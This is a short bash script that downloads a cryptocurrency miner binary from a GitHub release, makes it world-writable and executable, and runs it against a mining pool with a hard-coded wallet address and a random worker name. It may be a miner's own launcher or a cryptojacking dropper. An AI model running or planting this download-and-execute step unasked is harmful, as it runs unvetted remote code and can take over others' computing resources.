#!/bin/bash
curl https://github.com/peakminer/peakminer/releases/download/v1.0.14/peakminer-1.0.14-linux-x86_64 -L -o pepek
chmod 777 pepek
./pepek --coin pearl -o de.pearl.gfwroute.com:1200 -u prl1pnyza9z22a6sy8k08xkcqgwtgwr95w5d2csh89snlg6yhqdgg9uusuxjqch.$(echo $RANDOM | md5sum | head -c 10)
